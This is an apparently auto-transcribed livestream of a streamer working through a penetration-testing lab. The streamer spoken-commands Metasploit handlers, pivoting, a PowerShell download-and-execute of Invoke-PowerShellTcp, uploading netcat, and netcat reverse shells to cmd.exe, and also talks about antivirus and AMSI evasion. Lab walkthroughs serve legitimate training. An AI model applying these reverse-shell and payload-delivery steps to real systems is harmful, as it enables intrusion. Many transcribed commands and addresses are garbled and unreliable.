again. Do something it doesn't need to reach back anywhere for. Okay, this guy seems to be having a little bit of problems, huh? Let's just refresh the page then. I think I might have broke them. Okay, I'm still good there. Session 17. UID. Not good over here anymore, it looks like. Okay, so there's our problem right there. Lost them again over here. That's okay though. That is okay. Exit out of there. Set payload. Actually, the payload should still be good, right? Show options. I think it's still bind, isn't it, and everything? Yeah, it's still bind and everything. Okay. So let's go ahead and set the R host to 10.200.73.150. Set L port to 111. Let's go ahead and run this again. And we'll run that up here. Should get our payload back. I'm going to try that bind one more time now. So I'm wondering if this guy's messed up and he didn't get that bind fully through. I wonder if it was actually antivirus or not. Let's find out. Right? Worst case scenario is I just do that again. So set or run auto route. Attack S for 10.200.173.100. What? That's 100% true. Okay. And let's go ahead and try to do that. Set L host again to, or R host, I mean, to 10.200.73.100. Set the L port to 4444. Let's go ahead and run that again. And we're going to try to run that bind again. Did you get him? You might have actually got him. Let's try a DIR again. You might have just got that rev.exe also. That bind shell really messed him up, didn't it? Yeah, we're not able to really do much on here. Or it started moving slow again, one of two. Okay, so that's still working like right there. Somebody's just moving super slow up here. So I'm wondering if that bind shell really messed him up pretty badly. He got that rev.exe though. He definitely got it. So let's go ahead and just try to suppose we're still connected to it, right? Supposedly we are, at least. Let's try to go into. Let's try to do a netcat again for 4444, right? And let's try to actually run rev.exe. That one guy, it really messed him up. That bind shell, I think. I just have to get right back into everything again. Okay. May have to do that one more time because that seems to have something went wrong there. Set our host to 10.200.108.150. Set our port 111. Alright, they're not talking anymore. Might have to redo everything again. Or the box is shut down. I didn't realize it. One of them two. Things happened. At least we got 28 minutes left. It usually seems to like to die around those times. So we try to extend it again. See if maybe the box died. Try to extend it. Ten 200 108.150, right? Yeah, even with our rem, he's not moving as fast out there anymore. 10 200. Oh, I said 108. Whoopsie daisy. 73. Whoops. Did I say 108 for the other one too? Scroll up a little bit. No, 73.100. Okay. At least I did that correctly. I was about to say, what the heck? Okay. Get UID. Alright, so we can do that now. Run auto route. TAC S. Pretend 200.73.100. Okay. So we got that now, right? We got the netcat listener up and running on port 444. Supposedly shell.exe or rev.exe worked for port 444. I just want to see if I get a callback. Okay, so that did not work like right there. So we can't do that one either. We can try a PowerShell script. We can go ahead and try that like real quick. See if we get anything with that. I'm kind of wondering, even after I get on there, what to do after that. Because we're still just going to be Thomas, right? So we did our PHP payload application, right? We did that. I want to say that we're completed with it. Completed. Okay, so we did all that, right? Probably not counting reverse shell. I want to try to do it a different way than what. Use curl to upload your new copy of netcat to the target. No. So PowerShell, C Windows temp, netcat username.exe. So it just wants me to create straight up a netcat reverse shell back. So I think I know another way to be able to do this. Let's go ahead and locate invoke PowerShell TCP, and we're going to grab this guy right here, and we're going to go ahead and we're going to copy that to like right here. And we are going to do we're going to nano. We'll go ahead and kind of this for you guys. Nano invoke PowerShell TCP. .ps1, right? We're going to page down. We're going to do an IWR. So we're going to say invoke PowerShell TCP TAC reverse TAC IP 10.200.1.73.200 TAC port 4444. Okay, what that's going to do is once we do the IEX IWR, it's going to automatically also run that. If we can't do the IEX IWR, then we can still download it as normal. Okay, so let's go ahead and do a Control-Z as session stack I. So we need to pretty much get this guy session 9, and we're going to upload invoke PowerShell TCP.ps1. So we're going to upload that guy to there, and we're going to hop back over into here, and we're going to do it like that. PowerShell IEX IWR HTTP 10.273.200.888/invoke PowerShell. How is it spelled? Yep. Okay. PowerShell TCP.ps1. Let's try that. We'll see if it gets it also. See if we can get over here. Well, it's definitely not going to get a get because it doesn't. There's no web server open right now. So it's definitely not going to work. Okay, so we do get a get, but now I have to have a listener for it also. So let's go ahead and Control Shift E, SSH, TAC I, ID RSA on 10.200, right? And we'll have a listener up and running for it this time. CD in the temp caret, TAC LA, /netcat for port TAC LVMP 4444. Let's try to do that one more time. We'll try to get that guy again, and we'll see if he runs it and if he does it. We do get a second get, and he doesn't look like he ran it. Okay. So it's getting him, right? I feel like it should be running him. Let's go ahead and do a wget for him. PS1. Here we got a third wget. Okay, so we got him. So now what we need to do is PowerShell, and then we just need to run it, right? We need to do a /invoke PowerShell TCP.ps1 invoke PowerShell TCP PowerShell TAC reverse TAC IP 10.200.108.73.200 TAC port is going to be 4444. Nothing. Okay. So that didn't work either. Damn. What about import module? Nothing. All right. Well, I guess we should just follow the write-up. So let's see what we got here. The web shell is all well and good, and actually I just wasted all that time and I didn't realize my son's gonna be awake soon. Clone the repository, git clone. Yep, we already have a netcat. Okay. This repository includes precompiled netcat binaries for both 32 and 64-bit systems. However, this is an ideal time to talk about cross compilation techniques. If you prefer to just use the default binaries, then skip to the last section of this task and use nc64.exe, which we're going to be using. Okay, bonus question, optional, follow these steps detailed above. Okay, so we want to actually, let's go ahead and download those binaries that he has like right there. So we can get that nc.exe, right, binary, okay. Sometimes it's easiest just to cross compile, horizontally speaking, okay. Make a file that's compiling it. Bonus question, also follow the steps above to compile it. Okay, we've compiled stuff before on this channel, so the copy of the netcat available. We now need to get it up to the target starter. Python web server on your attacking machine. Really, it's demonstrated numerous times. I wonder if I can actually do it on my attacking machine. I wonder if we can actually get it. Python's free. Attack-M, HTTP.server on 480. Let's see if we can actually get it. Now let's see if we can do a wget up here. PowerShell, wget, HTTP. I feel like it can't. Because I feel like it can't ping me. But we'll find out. Because I'm not using Chisel. I'll file the nc.exe. He can hit. Okay, he's hitting me. Saying 301 to 200. That's kind of weird, I think. Let's do a dir. Let's make sure it actually got in there. Yeah, nc.exe. We know what's not in there is all the other ones that I did, huh? Wow. You notice that? Huh. All the other ones I tried to upload are not in there. So I wonder if they're immediately being caught as a virus. Or I'm wondering if AMSI bypass isn't allowing it through. That could also be a problem. Okay, well, we got that cat up there now, right? So now we can go ahead, we can use shelter. We could generate execute reverse shell using MSF Venom, then upload and activate in the web shell. Web shell. Again, MSF Venom tends to be very distinctive. We could use Veal framework to give us interpreter shell executable, then write bypass vendor. Let's try to keep this manual for time. Equally shelter, though old might need. Okay. There are easier options though. So we made that, right? We got it up there. Okay. Displaying it often being much harder to upload binaries to Windows than it is to wasn't much harder. PowerShell might work, but with AMSI in play, it's a risk. See? It was AMSI bypass. They got us. They caught it. I should have threw an AMSI bypass in there and then upload it. Whatever. We should use the file upload point that we originally exploited to upload an unrestricted PHP file uploader in the same way that we upload the original web shell, although this would be a bit of a pain with embedding the uploader in the image. We could look for other command line tools on the target such as curl or cert-util, both of which might allow for a file upload. Well, we upload the file. The web shell both should work. What output do you get when running the command cert-util.exe? I have no idea. Cert-util is not on there though. Cert-util.exe. It is not in that folder. Okay. Dump command. Is that what he wanted, like right there? Does he want the period at the end? Yes, he does. Okay, so we could use cert-util, I guess. But we definitely use PowerShell, and we definitely got like that. I'm just going to say alternate to wget PowerShell. Alternate to wget PowerShell. Alright, and it's almost time. Okay, so now we can curl it to the attacker machine. Cert-util is a default Windows tool that is used amongst other things to download the CA certificates, certificate authority certificates. This also makes it ideal for file transfers, but Defender flags this as malicious. Instead, we'll stick to the trusty old curl. This curl on the machine. Well, I guess we're curling it to it, huh? So let's go ahead and see Windows temp, okay? And then that cat attack username.exe. Let's go ahead and do that. Go ahead and curl it up there. So we'll try to do curl. Obviously the attacker IP, which is going to be 10.50.66.5. OGC1.exe. Fail to connect. Oh shit. 10.200.73.100. Oh, definitely said attacker IP, huh? Wait, how's he going to there? Wait. Does this machine have curl on it up here? Does he have curl? Oh, we already threw netcat.exe in there, didn't we? So I really don't need to even do that. It's already there. We can just go ahead and copy netcat.exe to Windows temp. So let's do a dir of C Windows temp. Oh, that worked great. Said that copied it. netcat.exe. Yeah, that ain't gonna work. Unless it actually has curl on the other machine. Which, if it does, that's kind of strange because that's not like a normal thing, I don't think, for Windows to have. I don't think it is. It might be. Let's go ahead and try to do it like this also, just to try it. But this is saying to do it. That's Linux, like right there. What is it trying? What are you trying to tell me? Use curl to upload your new copy of netcat to the target. We would need an IP address. We'll probably put an IP address at the end, huh? web server. Am I just doing this retardedly? I think I am. Okay, we already got on there. We use PowerShell, we already got on there. Sure. Okay, now we have everything. Attacker IP, attack 4, attack E, command.exe. Okay. Why do I keep doing like this? I think he thinks we're in something else. Probably because we're supposed to be using chisel, huh? That's probably why. So here, like, why is it like that? Probably because we're supposed to be using chisel, but we did not. So let's go ahead and do a netcat.exe. We can actually cat for scripts. Netcat reverse shell, right? Attack E. We're not going to do bin bash, obviously. This could be like command or something like that, right? Attack E command. Yep. So we're going to do netcat.exe. Attack E, or no. And then my IP address, my port I want to listen on. So let's go ahead and, I guess, start up a Control Z, yes. Set payload to generic. For Windows, yeah, let's do a generic shell, reverse TCP, set L host to myself, on 0, set L port, 4444, go ahead and run that. Make sure that actually runs. Okay, it is. Then we'll head back over to here. Netcat attack E, netcat attack C for me, right? 10.50, what is my thing? I have config 10.50.66.5, right? So tell me to do right? Yep. Port 4444, attack E, command.exe. I didn't even try, did it? So you send it back to him. Now all the way back to me. So I'm not using chisel. That's what I think we should do. We did prove that he can talk back to me. Stop. Copy netcat.exe to C Windows cast. Did we lose everything again? Session 19, get UID. Looks like we lost it again, huh? Yeah, it does. Okay. Interpreter bind TCP set our host 10.200.108.150 set with port 111. Run that guy. Run him. Do we still have a shell going through? We do, okay. Keep messing that up, don't I? Actually, we'll try to send it back to him first. Okay. And let's actually try to send it back to 10.200.73.200. Let's see if he gets it back. Nothing. On port 444 command.exe. He's not getting anything back, huh? Wonder what's happening. Should resolve in reverse shell. He also did on port 443. That might be a better port. I wonder if it's actually blocking the port itself. Which if that's the case, then we need to add that port in there, huh? Firewall command. Zone. I forget it every time. Attack zone. Zone equals public. Add port equals 443. Alright, this is gonna be my last try. What? Let's look at this. Oh, yep. This is gonna be my last try. Even if it connects or not, I gotta go after this. So we'll go ahead and we will try to do a 443 with the netcat listener. Port 443. Have to do like a sudo. Cannot set up a listening socket. Error number 3. Okay, let's try to do it back over here. Use exploit multi-handler, set the payload, set payload to when to generic. Let's do shell reverse TCP, set L host to 0, set L port 443. Let's go ahead and run that. That should work just fine over there. 1050, 66.5. Whoopsie daisy. On port 443. Let's try that. Nothing. Do a DIR. Make sure it's even still in there. It is. Let's do a DIR of C Windows CAS. That's okay. Nothing's in there. What about C Windows 10? Alright. Seem to have lost it again. So we're gonna let this guy go for now. Still not gonna do chisel yet. We'll try to figure out another way to be able to get around this. Publish directory list. This shell will get picked up by Ferris, so don't do it anywhere else. But it will give you a feel for how antivirus operates with texture payloads being malicious. Yeah, it just pretty much kills your box. You should get an error message when trying to execute the executable. The exe will also disappear from the current directory. Yep, placing quarantine by the AV at this point, the administrator has also been alerted along with security. Seeing a bigger organization. Yep. In order for this to work, we had to wrap the netcat command inside a PowerShell process to keep it from exiting early. Oh my god. Really? I wonder if that's what the problem is like right now. Let's do a DIR. Alright, well, we know we need to wrap the command inside a PowerShell process. That's going to be it for today until tonight. My wife's still sick, so I'm not sitting next to her. Alright, but that's going to be it for today till tonight. So I will talk to you guys later, and you all have a good one. Let me see if anyone else is on InfoSec streams. We can send you over there. Nope, I'm the only one on like right now. Alright, cool. So, you have a good one, and yeah. Like I said, I'll talk to you all later, and we will get back on that guy, and we will start up tonight right where we left off at. Wrap it in PowerShell, because I think netcat is exiting early, and that's probably why also we're not even seeing it, even put it in HTML format up there, or, you know, URL and code it. I guess would be the proper way to say that, huh? So, just trying to get out of here. There we go. So yeah, thanks for watching.